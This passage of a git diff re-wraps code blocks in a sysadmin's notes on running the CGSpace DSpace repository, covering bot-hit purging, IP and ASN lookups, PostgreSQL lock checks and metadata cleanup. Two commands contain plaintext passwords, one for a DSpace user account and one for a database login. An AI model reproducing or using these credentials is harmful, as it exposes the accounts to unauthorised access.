                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                            $ dspace user -a -m rafael-approve@cgiar.org -g Rafael -s Rodriguez -p 'fuuuuuu'
                                                                                                                                                                                                                                                                                                                                                                            +

                                                                                                                                                                                                                                                                                                                                                                            2021-12-27

                                                                                                                                                                                                                                                                                                                                                                            • Start a fresh harvest on AReS
                                                                                                                                                                                                                                                                                                                                                                            @@ -452,8 +452,8 @@ BUG_REPORT_URL="https://bugs.debian.org/"
                                                                                                                                                                                                                                                                                                                                                                            • Looking at the top IPs and user agents on CGSpace’s Solr statistics I see a strange user agent:
                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                            Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.{random.randint(0, 9999)} Safari/537.{random.randint(0, 99)}
                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                              Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.{random.randint(0, 9999)} Safari/537.{random.randint(0, 99)}
                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                              • I found two IPs using user agents with the “randint” bug:
                                                                                                                                                                                                                                                                                                                                                                                • 47.252.80.214 (AliCloud in the US)
                                                                                                                                                                                                                                                                                                                                                                                • @@ -469,26 +469,26 @@ BUG_REPORT_URL="https://bugs.debian.org/"
                                                                                                                                                                                                                                                                                                                                                                                • 3.225.28.105 is on Amazon and making thousands of requests for the same URL:
                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                /rest/collections/1118/items?expand=all&limit=1
                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                  /rest/collections/1118/items?expand=all&limit=1
                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                  • Most of the time it has a real-looking user agent, but sometimes it uses Apache-HttpClient/4.3.4 (java 1.5)
                                                                                                                                                                                                                                                                                                                                                                                  • Another 82.65.26.228 is doing SQL injection attempts from France
                                                                                                                                                                                                                                                                                                                                                                                  • 216.213.28.138 is some scrape-as-a-service bot from Sprious
                                                                                                                                                                                                                                                                                                                                                                                  • I used my resolve-addresses-geoip2.py script to get the ASNs for all the IPs in Solr stats this month, then extracted the ASNs that were responsible for more than one IP:
                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                  $ ./ilri/resolve-addresses-geoip2.py -i /tmp/ips.txt -o /tmp/2021-12-29-ips.csv
                                                                                                                                                                                                                                                                                                                                                                                  -$ csvcut -c asn /tmp/2021-12-29-ips.csv | sed 1d | sort | uniq -c | sort -h | awk '$1 > 1'
                                                                                                                                                                                                                                                                                                                                                                                  -      2 10620
                                                                                                                                                                                                                                                                                                                                                                                  -      2 265696
                                                                                                                                                                                                                                                                                                                                                                                  -      2 6147
                                                                                                                                                                                                                                                                                                                                                                                  -      2 9299
                                                                                                                                                                                                                                                                                                                                                                                  -      3 3269
                                                                                                                                                                                                                                                                                                                                                                                  -      5 16509
                                                                                                                                                                                                                                                                                                                                                                                  -      5 49505
                                                                                                                                                                                                                                                                                                                                                                                  -      9 24757
                                                                                                                                                                                                                                                                                                                                                                                  -      9 24940
                                                                                                                                                                                                                                                                                                                                                                                  -      9 64267
                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                    $ ./ilri/resolve-addresses-geoip2.py -i /tmp/ips.txt -o /tmp/2021-12-29-ips.csv
                                                                                                                                                                                                                                                                                                                                                                                    +$ csvcut -c asn /tmp/2021-12-29-ips.csv | sed 1d | sort | uniq -c | sort -h | awk '$1 > 1'
                                                                                                                                                                                                                                                                                                                                                                                    +      2 10620
                                                                                                                                                                                                                                                                                                                                                                                    +      2 265696
                                                                                                                                                                                                                                                                                                                                                                                    +      2 6147
                                                                                                                                                                                                                                                                                                                                                                                    +      2 9299
                                                                                                                                                                                                                                                                                                                                                                                    +      3 3269
                                                                                                                                                                                                                                                                                                                                                                                    +      5 16509
                                                                                                                                                                                                                                                                                                                                                                                    +      5 49505
                                                                                                                                                                                                                                                                                                                                                                                    +      9 24757
                                                                                                                                                                                                                                                                                                                                                                                    +      9 24940
                                                                                                                                                                                                                                                                                                                                                                                    +      9 64267
                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                    • AS 64267 is Sprious, and it has used these IPs this month:
                                                                                                                                                                                                                                                                                                                                                                                      • 216.213.28.136
                                                                                                                                                                                                                                                                                                                                                                                      • @@ -526,37 +526,37 @@ $ csvcut -c asn /tmp/2021-12-29-ips.csv | sed 1d | sort | uniq -c | sort -h | aw
                                                                                                                                                                                                                                                                                                                                                                                      • I ran the script to purge spider agents with the latest updates:
                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                      $ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
                                                                                                                                                                                                                                                                                                                                                                                      -Purging 2530 hits from HeadlessChrome in statistics
                                                                                                                                                                                                                                                                                                                                                                                      -Purging 10676 hits from randint in statistics
                                                                                                                                                                                                                                                                                                                                                                                      -Purging 3579 hits from Koha in statistics
                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                      -Total number of bot hits purged: 16785
                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                        $ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 2530 hits from HeadlessChrome in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 10676 hits from randint in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 3579 hits from Koha in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                        +Total number of bot hits purged: 16785
                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                        • Then the IPs:
                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                        $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips-to-purge.txt -p
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 1190 hits from 216.213.28.136 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 1128 hits from 207.182.27.191 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 1095 hits from 216.41.235.187 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 1087 hits from 216.41.232.169 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 1011 hits from 216.41.235.186 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 945 hits from 52.124.19.190 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 933 hits from 216.213.28.138 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 930 hits from 216.41.234.163 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 4410 hits from 45.146.166.173 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 2688 hits from 45.134.26.171 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 1130 hits from 45.146.164.123 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 536 hits from 45.155.205.231 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 10676 hits from 195.54.167.122 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 1350 hits from 54.76.137.83 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 1240 hits from 34.253.119.85 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 2879 hits from 34.216.201.131 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 2909 hits from 54.203.193.46 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 1822 hits from 2605\:b100\:316\:7f74\:8d67\:5860\:a9f3\:d87c in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                        -Total number of bot hits purged: 37959
                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                        $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips-to-purge.txt -p
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 1190 hits from 216.213.28.136 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 1128 hits from 207.182.27.191 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 1095 hits from 216.41.235.187 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 1087 hits from 216.41.232.169 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 1011 hits from 216.41.235.186 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 945 hits from 52.124.19.190 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 933 hits from 216.213.28.138 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 930 hits from 216.41.234.163 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 4410 hits from 45.146.166.173 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 2688 hits from 45.134.26.171 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 1130 hits from 45.146.164.123 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 536 hits from 45.155.205.231 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 10676 hits from 195.54.167.122 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 1350 hits from 54.76.137.83 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 1240 hits from 34.253.119.85 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 2879 hits from 34.216.201.131 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 2909 hits from 54.203.193.46 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 1822 hits from 2605\:b100\:316\:7f74\:8d67\:5860\:a9f3\:d87c in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                        +Total number of bot hits purged: 37959
                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                        diff --git a/docs/2022-01/index.html b/docs/2022-01/index.html index 61f46d82c..2d0570d4b 100644 --- a/docs/2022-01/index.html +++ b/docs/2022-01/index.html @@ -24,7 +24,7 @@ Start a full harvest on AReS Start a full harvest on AReS "/> - + @@ -122,12 +122,12 @@ Start a full harvest on AReS
                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                    $ cat 2022-01-06-add-orcids.csv 
                                                                                                                                                                                                                                                                                                                                                                                    -dc.contributor.author,cg.creator.identifier
                                                                                                                                                                                                                                                                                                                                                                                    -"Jones, Chris","Chris Jones: 0000-0001-9096-9728"
                                                                                                                                                                                                                                                                                                                                                                                    -"Jones, Christopher S.","Chris Jones: 0000-0001-9096-9728"
                                                                                                                                                                                                                                                                                                                                                                                    -$ ./ilri/add-orcid-identifiers-csv.py -i 2022-01-06-add-orcids.csv -db dspace63 -u dspacetest -p 'dom@in34sniper' 
                                                                                                                                                                                                                                                                                                                                                                                    -

                                                                                                                                                                                                                                                                                                                                                                                    2022-01-09

                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                    $ cat 2022-01-06-add-orcids.csv 
                                                                                                                                                                                                                                                                                                                                                                                    +dc.contributor.author,cg.creator.identifier
                                                                                                                                                                                                                                                                                                                                                                                    +"Jones, Chris","Chris Jones: 0000-0001-9096-9728"
                                                                                                                                                                                                                                                                                                                                                                                    +"Jones, Christopher S.","Chris Jones: 0000-0001-9096-9728"
                                                                                                                                                                                                                                                                                                                                                                                    +$ ./ilri/add-orcid-identifiers-csv.py -i 2022-01-06-add-orcids.csv -db dspace63 -u dspacetest -p 'dom@in34sniper' 
                                                                                                                                                                                                                                                                                                                                                                                    +

                                                                                                                                                                                                                                                                                                                                                                                    2022-01-09

                                                                                                                                                                                                                                                                                                                                                                                    • Validate and register CGSpace on OpenArchives
                                                                                                                                                                                                                                                                                                                                                                                        @@ -147,21 +147,21 @@ $ ./ilri/add-orcid-identifiers-csv.py -i 2022-01-06-add-orcids.csv -db dspace63
                                                                                                                                                                                                                                                                                                                                                                                        • I tried to re-build the Docker image for OpenRXV and got an error in the backend:
                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                        ...
                                                                                                                                                                                                                                                                                                                                                                                        -> openrxv-backend@0.0.1 build
                                                                                                                                                                                                                                                                                                                                                                                        -> nest build
                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                        -node_modules/@elastic/elasticsearch/api/types.d.ts:2454:13 - error TS2456: Type alias 'AggregationsAggregate' circularly references itself.
                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                        -2454 export type AggregationsAggregate = AggregationsSingleBucketAggregate | AggregationsAutoDateHistogramAggregate | AggregationsFiltersAggregate | AggregationsSignificantTermsAggregate<any> | AggregationsTermsAggregate<any> | AggregationsBucketAggregate | AggregationsCompositeBucketAggregate | AggregationsMultiBucketAggregate<AggregationsBucket> | AggregationsMatrixStatsAggregate | AggregationsKeyedValueAggregate | AggregationsMetricAggregate
                                                                                                                                                                                                                                                                                                                                                                                        -                 ~~~~~~~~~~~~~~~~~~~~~
                                                                                                                                                                                                                                                                                                                                                                                        -node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type alias 'AggregationsSingleBucketAggregate' circularly references itself.
                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                        -3209 export type AggregationsSingleBucketAggregate = AggregationsSingleBucketAggregateKeys
                                                                                                                                                                                                                                                                                                                                                                                        -                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                        -Found 2 error(s).
                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                          ...
                                                                                                                                                                                                                                                                                                                                                                                          +> openrxv-backend@0.0.1 build
                                                                                                                                                                                                                                                                                                                                                                                          +> nest build
                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                          +node_modules/@elastic/elasticsearch/api/types.d.ts:2454:13 - error TS2456: Type alias 'AggregationsAggregate' circularly references itself.
                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                          +2454 export type AggregationsAggregate = AggregationsSingleBucketAggregate | AggregationsAutoDateHistogramAggregate | AggregationsFiltersAggregate | AggregationsSignificantTermsAggregate<any> | AggregationsTermsAggregate<any> | AggregationsBucketAggregate | AggregationsCompositeBucketAggregate | AggregationsMultiBucketAggregate<AggregationsBucket> | AggregationsMatrixStatsAggregate | AggregationsKeyedValueAggregate | AggregationsMetricAggregate
                                                                                                                                                                                                                                                                                                                                                                                          +                 ~~~~~~~~~~~~~~~~~~~~~
                                                                                                                                                                                                                                                                                                                                                                                          +node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type alias 'AggregationsSingleBucketAggregate' circularly references itself.
                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                          +3209 export type AggregationsSingleBucketAggregate = AggregationsSingleBucketAggregateKeys
                                                                                                                                                                                                                                                                                                                                                                                          +                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                          +Found 2 error(s).
                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                          • Ah, it seems the code on the server was slightly out of date
                                                                                                                                                                                                                                                                                                                                                                                            • I checked out the latest master branch and it built
                                                                                                                                                                                                                                                                                                                                                                                            • @@ -180,20 +180,20 @@ node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type
                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                          $ psql -c "SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | sort | uniq -c | sort -n
                                                                                                                                                                                                                                                                                                                                                                                          -      1 
                                                                                                                                                                                                                                                                                                                                                                                          -      1 ------------------
                                                                                                                                                                                                                                                                                                                                                                                          -      1 (3506 rows)
                                                                                                                                                                                                                                                                                                                                                                                          -      1  application_name 
                                                                                                                                                                                                                                                                                                                                                                                          -      9  psql
                                                                                                                                                                                                                                                                                                                                                                                          -     10  
                                                                                                                                                                                                                                                                                                                                                                                          -   3487  dspaceWeb
                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                            $ psql -c "SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | sort | uniq -c | sort -n
                                                                                                                                                                                                                                                                                                                                                                                            +      1 
                                                                                                                                                                                                                                                                                                                                                                                            +      1 ------------------
                                                                                                                                                                                                                                                                                                                                                                                            +      1 (3506 rows)
                                                                                                                                                                                                                                                                                                                                                                                            +      1  application_name 
                                                                                                                                                                                                                                                                                                                                                                                            +      9  psql
                                                                                                                                                                                                                                                                                                                                                                                            +     10  
                                                                                                                                                                                                                                                                                                                                                                                            +   3487  dspaceWeb
                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                            • As before, I see messages from PostgreSQL about processes waiting for locks since I enabled the log_lock_waits setting last month:
                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                            $ grep -E '^2022-01*' /var/log/postgresql/postgresql-10-main.log | grep -c 'still waiting for'
                                                                                                                                                                                                                                                                                                                                                                                            -12
                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                              $ grep -E '^2022-01*' /var/log/postgresql/postgresql-10-main.log | grep -c 'still waiting for'
                                                                                                                                                                                                                                                                                                                                                                                              +12
                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                              • I set a system alert on DSpace and then restarted the server

                                                                                                                                                                                                                                                                                                                                                                                              2022-01-20

                                                                                                                                                                                                                                                                                                                                                                                              @@ -204,8 +204,8 @@ node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type
                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                          $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=aorth@mjanja.ch --source /tmp/SimpleArchiveFormat --mapfile=./2022-01-20-green-covers.map
                                                                                                                                                                                                                                                                                                                                                                                          -

                                                                                                                                                                                                                                                                                                                                                                                          2022-01-21

                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                          $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=aorth@mjanja.ch --source /tmp/SimpleArchiveFormat --mapfile=./2022-01-20-green-covers.map
                                                                                                                                                                                                                                                                                                                                                                                          +

                                                                                                                                                                                                                                                                                                                                                                                          2022-01-21

                                                                                                                                                                                                                                                                                                                                                                                          • Start working on the rest of the ~980 CGIAR TAC and ICW documents from Gaia
                                                                                                                                                                                                                                                                                                                                                                                              @@ -243,21 +243,21 @@ node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type
                                                                                                                                                                                                                                                                                                                                                                                            • Normalize the metadata text_lang attributes on CGSpace database:
                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                            dspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
                                                                                                                                                                                                                                                                                                                                                                                            - text_lang |  count  
                                                                                                                                                                                                                                                                                                                                                                                            ------------+---------
                                                                                                                                                                                                                                                                                                                                                                                            - en_US     | 2803350
                                                                                                                                                                                                                                                                                                                                                                                            - en        |    6232
                                                                                                                                                                                                                                                                                                                                                                                            -           |    3200
                                                                                                                                                                                                                                                                                                                                                                                            - fr        |       2
                                                                                                                                                                                                                                                                                                                                                                                            - vn        |       2
                                                                                                                                                                                                                                                                                                                                                                                            - 92        |       1
                                                                                                                                                                                                                                                                                                                                                                                            - sp        |       1
                                                                                                                                                                                                                                                                                                                                                                                            -           |       0
                                                                                                                                                                                                                                                                                                                                                                                            -(8 rows)
                                                                                                                                                                                                                                                                                                                                                                                            -dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('en', '92', '');
                                                                                                                                                                                                                                                                                                                                                                                            -UPDATE 9433
                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                              dspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
                                                                                                                                                                                                                                                                                                                                                                                              + text_lang |  count  
                                                                                                                                                                                                                                                                                                                                                                                              +-----------+---------
                                                                                                                                                                                                                                                                                                                                                                                              + en_US     | 2803350
                                                                                                                                                                                                                                                                                                                                                                                              + en        |    6232
                                                                                                                                                                                                                                                                                                                                                                                              +           |    3200
                                                                                                                                                                                                                                                                                                                                                                                              + fr        |       2
                                                                                                                                                                                                                                                                                                                                                                                              + vn        |       2
                                                                                                                                                                                                                                                                                                                                                                                              + 92        |       1
                                                                                                                                                                                                                                                                                                                                                                                              + sp        |       1
                                                                                                                                                                                                                                                                                                                                                                                              +           |       0
                                                                                                                                                                                                                                                                                                                                                                                              +(8 rows)
                                                                                                                                                                                                                                                                                                                                                                                              +dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('en', '92', '');
                                                                                                                                                                                                                                                                                                                                                                                              +UPDATE 9433
                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                              • Then export the WLE Journal Articles collection again so there are fewer columns to mess with

                                                                                                                                                                                                                                                                                                                                                                                              2022-01-26

                                                                                                                                                                                                                                                                                                                                                                                              @@ -273,7 +273,7 @@ UPDATE 9433
                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                          cells['dcterms.bibliographicCitation[en_US]'].value.split("doi: ")[1]
                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                          cells['dcterms.bibliographicCitation[en_US]'].value.split("doi: ")[1]
                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                          • I also spent a bit of time cleaning up ILRI Journal Articles, but I notice that we don’t put DOIs in the citation so it’s not possible to fix items that are missing DOIs that way
                                                                                                                                                                                                                                                                                                                                                                                              @@ -286,17 +286,17 @@ UPDATE 9433
                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                          $ psql -c "SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | sort | uniq -c | sort -n
                                                                                                                                                                                                                                                                                                                                                                                          -      1 
                                                                                                                                                                                                                                                                                                                                                                                          -      1 ------------------
                                                                                                                                                                                                                                                                                                                                                                                          -      1 (537 rows)
                                                                                                                                                                                                                                                                                                                                                                                          -      1  application_name 
                                                                                                                                                                                                                                                                                                                                                                                          -      9  psql
                                                                                                                                                                                                                                                                                                                                                                                          -     51  dspaceApi
                                                                                                                                                                                                                                                                                                                                                                                          -    477  dspaceWeb
                                                                                                                                                                                                                                                                                                                                                                                          -$ grep -E '^2022-01*' /var/log/postgresql/postgresql-10-main.log | grep -c 'still waiting for'
                                                                                                                                                                                                                                                                                                                                                                                          -3
                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                            $ psql -c "SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | sort | uniq -c | sort -n
                                                                                                                                                                                                                                                                                                                                                                                            +      1 
                                                                                                                                                                                                                                                                                                                                                                                            +      1 ------------------
                                                                                                                                                                                                                                                                                                                                                                                            +      1 (537 rows)
                                                                                                                                                                                                                                                                                                                                                                                            +      1  application_name 
                                                                                                                                                                                                                                                                                                                                                                                            +      9  psql
                                                                                                                                                                                                                                                                                                                                                                                            +     51  dspaceApi
                                                                                                                                                                                                                                                                                                                                                                                            +    477  dspaceWeb
                                                                                                                                                                                                                                                                                                                                                                                            +$ grep -E '^2022-01*' /var/log/postgresql/postgresql-10-main.log | grep -c 'still waiting for'
                                                                                                                                                                                                                                                                                                                                                                                            +3
                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                            • I set a system alert on CGSpace and then restarted Tomcat and PostgreSQL
                                                                                                                                                                                                                                                                                                                                                                                              • The issue in Francesca’s case was actually that someone had taken the task, not that PostgreSQL transactions were locked!
                                                                                                                                                                                                                                                                                                                                                                                              • @@ -344,19 +344,19 @@ $ grep -E '^2022-01*' /var/log/postgr
                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                            value.contains(/:\s?\d+(-|–)\d+/)
                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                              value.contains(/:\s?\d+(-|–)\d+/)
                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                              • Then I faceted by blank on dcterms.extent and did a transform to extract the page information for over 1,000 items!
                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                              'p. ' +
                                                                                                                                                                                                                                                                                                                                                                                              -cells['dcterms.bibliographicCitation[en_US]'].value.match(/.*:\s?(\d+)(-|–)(\d+).*/)[0] +
                                                                                                                                                                                                                                                                                                                                                                                              -'-' +
                                                                                                                                                                                                                                                                                                                                                                                              -cells['dcterms.bibliographicCitation[en_US]'].value.match(/.*:\s?(\d+)(-|–)(\d+).*/)[2]
                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                'p. ' +
                                                                                                                                                                                                                                                                                                                                                                                                +cells['dcterms.bibliographicCitation[en_US]'].value.match(/.*:\s?(\d+)(-|–)(\d+).*/)[0] +
                                                                                                                                                                                                                                                                                                                                                                                                +'-' +
                                                                                                                                                                                                                                                                                                                                                                                                +cells['dcterms.bibliographicCitation[en_US]'].value.match(/.*:\s?(\d+)(-|–)(\d+).*/)[2]
                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                • Then I did similar for cg.volume and cg.issue, also based on the citation, for example to extract the “16” from “Journal of Blah 16(1)”, where “16” is the second capture group in a zero-based match:
                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                cells['dcterms.bibliographicCitation[en_US]'].value.match(/.*( |;)(\d+)\((\d+)\).*/)[1]
                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                  cells['dcterms.bibliographicCitation[en_US]'].value.match(/.*( |;)(\d+)\((\d+)\).*/)[1]
                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                  • This was 3,000 items so I imported the changes on CGSpace 1,000 at a time…
                                                                                                                                                                                                                                                                                                                                                                                                  diff --git a/docs/2022-02/index.html b/docs/2022-02/index.html index ef4491673..f60e6c3fe 100644 --- a/docs/2022-02/index.html +++ b/docs/2022-02/index.html @@ -38,7 +38,7 @@ We agreed to try to do more alignment of affiliations/funders with ROR "/> - + @@ -138,44 +138,44 @@ We agreed to try to do more alignment of affiliations/funders with ROR
                                                                                                                                                                                                                                                                                                                                                                                                  • I moved a bunch of communities:
                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                  $ dspace community-filiator --remove --parent=10568/114639 --child=10568/115089
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --remove --parent=10568/114639 --child=10568/115087
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --remove --parent=10568/83389 --child=10568/108598
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --remove --parent=10568/83389 --child=10947/1
